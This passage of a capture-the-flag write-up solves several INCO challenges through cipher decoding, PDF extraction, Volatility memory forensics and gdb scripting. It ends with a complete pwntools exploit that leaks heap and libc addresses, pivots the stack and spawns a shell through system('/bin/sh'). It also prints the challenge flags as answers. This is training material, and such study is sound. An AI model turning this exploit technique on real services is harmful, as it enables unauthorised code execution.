        # The next position already holds charset_range[0], matching
        # bf_idx = 0.
        print('hit!, ', bytes(flag))
        idx += 1
        bf_idx = 0
    elif present_bp == goal:
        gdb.execute('c')
        break
    else:
        # Any other stop (e.g. one of the three fixed breakpoints) is
        # treated as a broken assumption.
        assert False
#INCO{y34h_3v3ry_op3ra7ion_w1th_on1y_nand_0v0_}
8. I’M FINE THANK YOU, AND U?
Lxwpajcdujcrxwb! Mabl ehhdl ebdx t jnbmx lbfiex vbiaxk. Vjhkn hxd'en wxcrlnm fqjc cqrb rb jc j pujwln. Ahpxoxk, mabl bl ghm matm yetz rhn'kx ehhdbgz yhk. Rc'b sdbc j urccun qrwc. Matm'l tee. Bx, wxf hxd twxf fqjc cx mx? GNIEEWYs0cpat3anahh1n1lsh0dlp3ahh1n3i1vp3d
rot ->
Sedwhqjkbqjyedi! This looks like a quite simple cipher. Cqoru oek'lu dejysut mxqj jxyi yi qj q wbqdsu. However, this is not that flag you're looking for. Yj'i zkij q byjjbu xydj. That's all. Ie, dem oek adem mxqj je te? NUPLLDFz0jwha3huhoo1u1szo0ksw3hoo1u3p1cw3k
NUPLLDFz0jwha3huhoo1u1szo0ksw3hoo1u3p1cw3k
Affine Cipher ->
INCOOMGy0uhav3anaff1n1tyf0rth3aff1n3c1ph3r
guess ->
INCO{OMG_y0u_hav3_an_aff1n1ty_f0r_th3_aff1n3_c1ph3r}
9. Bondee
extract PDF from image
inside PDF:
X Pos Y Pos Text
85,03 733,36 직접 관리하고 추후에 사용자들로 하여금 잔액을 되찾아가게 하였다. 이로 인해 IOTA 재단의
85,03 717,42 신뢰성마저도 추락한 사건이었다.
85,03 685,41 IOTA 팀에 따르면 Curl hahser라는 하드웨어 장치가 있어야만 IOTA 거래를 생성하기 위해
85,03 669,47 필요한 작업증명을 수행할 수 있다고 한다.
85,03 621,52 방향성 비사이클 그래프(DAG) 아키텍처 자체는
85,03 605,46 흥미롭고 새로운 방식으로 분산 장부를 만드는 메커니즘이다.
85,03 589,51 DAG가
...
85,03 285,89 number_list
148,72 285,89 = [73, 78,
203,77 285,89 67,
223,92 285,89 79, 123,
269,85 285,89 105,
295,52 285,89 110, 99,
341,46 285,89 111,
367,12 285,89 95, 115,
413,06 285,89 119,
438,72 285,89 108, 117,
490,17 285,89 103,
85,03 269,82 95, 50, 48, 50, 51, 125]
85,03 253,88 text_list = []
85,03 221,88 for i in range(len(number_list)):
85,03 189,99 text_list.append(chr(number_list[i]))
85,03 142,04 str = ''.join(text_list)
85,03 110,04 print("Flag= " + str)
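# Byte values recovered from the PDF text, in the order the embedded script
# listed them (line breaks kept so they match the extracted rows).
number_list = [
    73, 78,
    67,
    79, 123,
    105,
    110, 99,
    111,
    95, 115,
    119,
    108, 117,
    103,
    95, 50, 48, 50, 51, 125,
]
# Each entry is a code point; joining their characters yields the flag.
# The original stored this in a variable named `str`, shadowing the
# builtin; `flag_text` avoids that.
flag_text = ''.join(map(chr, number_list))
print("Flag= " + flag_text)#Flag= INCO{inco_swlug_2023}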
10. WOW
Volatility Foundation Volatility Framework 2.6.1
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win10x64_10240_17770, Win10x64
AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/home/kali/Downloads/ctf/incognito/wow/WOW.vmem)
PAE type : No PAE
DTB : 0x1ab000L
KDBG : 0xf803f538cb20L
Number of Processors : 1
Image Type (Service Pack) : 0
KPCR for CPU 0 : 0xfffff803f53e6000L
KUSER_SHARED_DATA : 0xfffff78000000000L
Image date and time : 2023-03-03 08:57:20 UTC+0000
Image local date and time : 2023-03-03 17:57:20 +0900
python2 vol.py -f /home/kali/Downloads/ctf/incognito/wow/WOW.vmem --profile=Win10x64_10240_17770 pslist
Volatility Foundation Volatility Framework 2.6.1
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xffffe001dc265840 System 4 0 185 0 ------ 0 2023-03-03 08:49:55 UTC+0000
0xffffe001dd977040 smss.exe 476 4 2 0 ------ 0 2023-03-03 08:49:55 UTC+0000
0xffffe001ddb56080 csrss.exe 568 560 8 0 0 0 2023-03-03 08:49:59 UTC+0000
0xffffe001ddd6f080 wininit.exe 628 560 1 0 0 0 2023-03-03 08:50:00 UTC+0000
0xffffe001ddd74080 csrss.exe 636 620 11 0 1 0 2023-03-03 08:50:00 UTC+0000
0xffffe001ddd9b080 winlogon.exe 672 620 2 0 1 0 2023-03-03 08:50:00 UTC+0000
0xffffe001dddef480 services.exe 732 628 6 0 0 0 2023-03-03 08:50:00 UTC+0000
0xffffe001dddfa080 lsass.exe 740 628 10 0 0 0 2023-03-03 08:50:00 UTC+0000
0xffffe001dde75080 svchost.exe 804 732 20 0 0 0 2023-03-03 08:50:01 UTC+0000
0xffffe001dde84840 svchost.exe 836 732 9 0 0 0 2023-03-03 08:50:02 UTC+0000
0xffffe001ddecc080 dwm.exe 932 672 8 0 1 0 2023-03-03 08:50:02 UTC+0000
0xffffe001ddf1b080 svchost.exe 508 732 71 0 0 0 2023-03-03 08:50:03 UTC+0000
0xffffe001ddf2b540 svchost.exe 8 732 22 0 0 0 2023-03-03 08:50:03 UTC+0000
0xffffe001ddf30840 svchost.exe 544 732 24 0 0 0 2023-03-03 08:50:03 UTC+0000
0xffffe001ddf45840 svchost.exe 728 732 31 0 0 0 2023-03-03 08:50:03 UTC+0000
0xffffe001ddf4d840 svchost.exe 792 732 16 0 0 0 2023-03-03 08:50:03 UTC+0000
0xffffe001ddfe6840 svchost.exe 1224 732 23 0 0 0 2023-03-03 08:50:04 UTC+0000
0xffffe001de0516c0 spoolsv.exe 1436 732 10 0 0 0 2023-03-03 08:50:04 UTC+0000
0xffffe001de0a8680 svchost.exe 1460 732 28 0 0 0 2023-03-03 08:50:05 UTC+0000
0xffffe001de1275c0 rundll32.exe 1624 508 1 0 0 0 2023-03-03 08:50:05 UTC+0000
0xffffe001de18a840 dasHost.exe 1812 792 9 0 0 0 2023-03-03 08:50:06 UTC+0000
0xffffe001de1d1080 svchost.exe 1844 732 11 0 0 0 2023-03-03 08:50:06 UTC+0000
0xffffe001de258540 svchost.exe 2020 732 6 0 0 0 2023-03-03 08:50:08 UTC+0000
0xffffe001de2d2340 vm3dservice.ex 1276 732 2 0 0 0 2023-03-03 08:50:08 UTC+0000
0xffffe001de304580 VGAuthService. 1792 732 2 0 0 0 2023-03-03 08:50:08 UTC+0000
0xffffe001de374480 vmtoolsd.exe 1948 732 13 0 0 0 2023-03-03 08:50:09 UTC+0000
0xffffe001de2e2080 vm3dservice.ex 2092 1276 2 0 1 0 2023-03-03 08:50:09 UTC+0000
0xffffe001de3a5840 MsMpEng.exe 2156 732 38 0 0 0 2023-03-03 08:50:09 UTC+0000
0xffffe001de492840 WmiPrvSE.exe 2340 804 9 0 0 0 2023-03-03 08:50:12 UTC+0000
0xffffe001de1e0640 sihost.exe 2348 508 11 0 1 0 2023-03-03 08:50:12 UTC+0000
0xffffe001de4c6840 taskhostw.exe 2372 508 13 0 1 0 2023-03-03 08:50:12 UTC+0000
0xffffe001de513840 dllhost.exe 2508 732 14 0 0 0 2023-03-03 08:50:13 UTC+0000
0xffffe001dd1d8600 CompatTelRunne 2856 1624 6 0 0 0 2023-03-03 08:50:19 UTC+0000
0xffffe001dc433080 msdtc.exe 2908 732 12 0 0 0 2023-03-03 08:50:22 UTC+0000
0xffffe001de6bf840 userinit.exe 832 672 0 -------- 1 0 2023-03-03 08:50:24 UTC+0000
0xffffe001de6df840 explorer.exe 1604 832 40 0 1 0 2023-03-03 08:50:24 UTC+0000
0xffffe001de240840 RuntimeBroker. 2644 804 15 0 1 0 2023-03-03 08:50:25 UTC+0000
0xffffe001de7b6840 NisSrv.exe 3156 732 8 0 0 0 2023-03-03 08:50:27 UTC+0000
0xffffe001de85a840 SearchIndexer. 3288 732 16 0 0 0 2023-03-03 08:50:28 UTC+0000
0xffffe001de8d7840 ShellExperienc 3504 804 19 0 1 0 2023-03-03 08:50:29 UTC+0000
0xffffe001de671840 SearchUI.exe 3624 804 23 0 1 0 2023-03-03 08:50:30 UTC+0000
0xffffe001dea59840 WmiPrvSE.exe 3728 804 10 0 0 0 2023-03-03 08:50:31 UTC+0000
0xffffe001de4af080 vmtoolsd.exe 4228 1604 8 0 1 0 2023-03-03 08:50:44 UTC+0000
0xffffe001de4c5080 OneDrive.exe 4384 1604 21 0 1 1 2023-03-03 08:50:47 UTC+0000
0xffffe001dec1a080 ApplicationFra 4660 804 7 0 1 0 2023-03-03 08:50:53 UTC+0000
0xffffe001ded6a840 MicrosoftEdge. 4756 804 33 0 1 0 2023-03-03 08:50:54 UTC+0000
0xffffe001dee4b840 browser_broker 4804 804 9 0 1 0 2023-03-03 08:50:55 UTC+0000
0xffffe001def1b840 MicrosoftEdgeC 4152 2644 27 0 1 0 2023-03-03 08:51:05 UTC+0000
0xffffe001ddf81080 svchost.exe 1448 732 3 0 1 0 2023-03-03 08:52:12 UTC+0000
0xffffe001de59b840 taskeng.exe 3808 508 4 0 1 0 2023-03-03 08:52:13 UTC+0000
0xffffe001dd9f5080 MicrosoftEdgeC 1016 2644 42 0 1 0 2023-03-03 08:52:17 UTC+0000
0xffffe001de7d3840 WmiApSrv.exe 1580 732 4 0 0 0 2023-03-03 08:53:33 UTC+0000
0xffffe001de4f2380 SearchProtocol 4280 3288 6 0 1 0 2023-03-03 08:54:54 UTC+0000
0xffffe001decf3080 taskhostw.exe 984 508 7 0 1 0 2023-03-03 08:55:14 UTC+0000
0xffffe001de003080 MicrosoftEdgeC 2460 2644 9 0 1 0 2023-03-03 08:55:40 UTC+0000
0xffffe001dec90840 MicrosoftEdgeC 5904 2644 23 0 1 0 2023-03-03 08:56:07 UTC+0000
0xffffe001de75e080 MicrosoftEdgeC 6056 2644 38 0 1 0 2023-03-03 08:56:21 UTC+0000
0xffffe001df58b080 SearchProtocol 3416 3288 7 0 0 0 2023-03-03 08:57:01 UTC+0000
0xffffe001dea1f840 SearchFilterHo 1584 3288 5 0 0 0 2023-03-03 08:57:01 UTC+0000
0xffffe001dd5ca080 MpCmdRun.exe 3996 4936 7 0 0 0 2023-03-03 08:57:02 UTC+0000
0xffffe001dd5ae080 WOW.exe 4024 4804 3 0 1 1 2023-03-03 08:57:14 UTC+0000
0xffffe001dd57d080 conhost.exe 5296 4024 3 0 1 0 2023-03-03 08:57:14 UTC+0000
0xffffe001dedbb840 audiodg.exe 4928 544 9 0 0 0 2023-03-03 08:57:14 UTC+0000
0xffffe001dd5f8840 cmd.exe 5224 1948 0 -------- 0 0 2023-03-03 08:57:18 UTC+0000
0xffffe001dd57f840 conhost.exe 3836 5224 0 -------- 0 0 2023-03-03 08:57:18 UTC+0000
python2 vol.py -f /home/kali/Downloads/ctf/incognito/wow/WOW.vmem --profile=Win10x64_10240_17770 procdump -D ./ -p 4024
strings *
result ->
m3m0ry_f0r3ns1c_1s_am4z1ng
guess ->
INCO{m3m0ry_f0r3ns1c_1s_am4z1ng}
11. STACKoverflow
rop chaining + stack pivoting
from pwn import *

#p = process('STACKoverflow')
# Remote target; the commented-out line above runs the local binary instead.
p = remote('ctf.incognito.kr', 50001)
# ELF wrappers for the binary and its libc: used below for GOT/PLT entries,
# symbol offsets and string search.
e = ELF('STACKoverflow')
libc = ELF('libc.so.6')
def Question(question):
    """Pick menu item 1 and submit *question*.

    A payload that exactly fills the 0x20-byte field is sent without a
    trailing newline; anything shorter is newline-terminated.
    """
    p.sendlineafter(b'>', b'1')
    deliver = p.sendafter if len(question) == 0x20 else p.sendlineafter
    deliver(b'>', question)
def Answer(num, answer, more):
    """Pick menu item 2, choose entry *num*, then send *answer* and *more*.

    Each field is sent without a newline when it exactly fills its slot
    (0x20 bytes for the answer, 0x60 for the extra text) and
    newline-terminated otherwise.
    """
    p.sendlineafter(b'>', b'2')
    p.sendlineafter(b'>', str(num))
    for payload, slot in ((answer, 0x20), (more, 0x60)):
        if len(payload) == slot:
            p.sendafter(b'>', payload)
        else:
            p.sendlineafter(b'>', payload)
# Gadgets in the fixed-address binary: `pop rdi; ret`, `leave; ret` and a
# lone `ret`.  The addresses are the author's; nothing here re-derives them.
pop_rdi = 0x00000000004016e5
leave_ret = 0x401688
ret = 0x000000000040101a
# Stage 1 — heap pointer leak.  Two full-width questions, an answer to #2
# and one more question; listing entry 2 then prints 0x40 'A's followed by
# bytes that are read back as a pointer.  Why that layout leaks is not
# visible here — presumably the 0x20-byte fields are stored unterminated
# next to a heap pointer.
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Answer(2, b'A' * 0x20, b'')
Question(b'A' * 0x20)
p.sendlineafter(b'>', b'2')
print(p.recvuntil(b'A' * 0x40))
# Everything up to the next "2." prompt (minus the prompt itself) is the
# leak, zero-padded to 8 bytes for u64.
heap_leak = u64(p.recvuntil(b'2.')[:-2].ljust(8, b'\x00'))
print(hex(heap_leak))
p.sendlineafter(b'>', b'2')
p.sendlineafter(b'>', b'2')
p.sendlineafter(b'>', b'')
#gdb.attach(p, 'b *0x401688\nb*0x40165B\n')
#pause()
# Stage 2 — 18 plain questions, one whose last 8 bytes are a heap address,
# and one more, so the offsets computed from heap_leak (multiples of 0x50)
# land where the author expects.  The layout arithmetic below is not
# re-derivable from this script alone.
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x18 + p64(heap_leak + 0x60 + 0x50*3*6+0x8))
Question(b'A' * 0x20)
# Answer 6: the 0x20-byte answer holds a short chain (pop rdi <- puts@GOT,
# call puts@PLT, resume at 0x40165B); the 0x60-byte "more" field ends with
# a heap address and `leave; ret`, which moves rsp onto the heap so that
# chain runs.  That the last 16 bytes reach the saved rbp and return
# address is inferred from the gadget choice, not visible here.
Answer(6, p64(pop_rdi) + p64(e.got['puts']) + p64(e.plt['puts']) + p64(0x40165B), b'A' * 0x50 + p64(heap_leak - 0x30 - 0x8 + 0x50 + 0x50*3*6) + p64(leave_ret))
# puts prints its own libc address; subtracting the symbol offset gives the
# libc load base.
libc_base = u64(p.recvline()[:-1].ljust(8, b'\x00')) - libc.symbols['puts']
# one_gadget candidates for this libc — computed and printed only; the
# final payload uses system("/bin/sh") instead.
og = [0x50a37, 0xebcf1, 0xebcf5, 0xebcf8]
one_gadget = libc_base + og[0]
print(hex(one_gadget))
system_addr = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
# Second payload (presumably consumed by the read reached via 0x40165B):
# nine `ret` slots (0x60//8 - 3) as filler, then pop rdi <- "/bin/sh" and
# system.
p.send(p64(ret) * (0x60//8-3) + p64(pop_rdi) + p64(binsh) + p64(system_addr))
p.interactive()
#INCO{"WH4T_A_N1C3_WE4THER_I5!"}